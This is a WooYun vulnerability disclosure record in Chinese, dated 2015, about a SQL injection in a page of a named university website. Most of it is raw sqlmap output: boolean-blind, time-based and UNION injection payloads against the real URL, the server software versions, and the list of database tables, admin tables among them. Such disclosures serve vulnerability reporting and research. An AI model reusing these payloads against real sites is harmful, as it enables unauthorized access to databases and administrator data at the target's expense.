乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-04: 细节已通知厂商并且等待厂商处理中 2015-12-09: 厂商已经主动忽略漏洞,细节向公众公开
http://tuanwei.nwu.edu.cn/tscms/paper.php?id=136&p=2
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=136 AND 6339=6339&p=2 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=136 AND (SELECT * FROM (SELECT(SLEEP(5)))RkPe)&p=2 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: id=136 UNION ALL SELECT CONCAT(0x716a787171,0x524a494477775379486d,0x7176716b71)-- &p=2---web application technology: Apache 2.2.3, PHP 5.2.0back-end DBMS: MySQL 5.0.12Database: newtuanwei[22 tables]+---------------------+| con_jinse || con_pdf || xb_admin || xb_admin111 || xb_admin_access || xb_admin_node || xb_admin_node111 || xb_admin_role || xb_admin_role_user || xb_article || xb_attachment || xb_attachment_index || xb_block || xb_block_item || xb_category || xb_model || xb_module || xb_nav || xb_page || xb_product || xb_session || xb_setting |+---------------------+
危害等级:无影响厂商忽略
忽略时间:2015-12-09 15:50
漏洞Rank:4 (WooYun评价)
暂无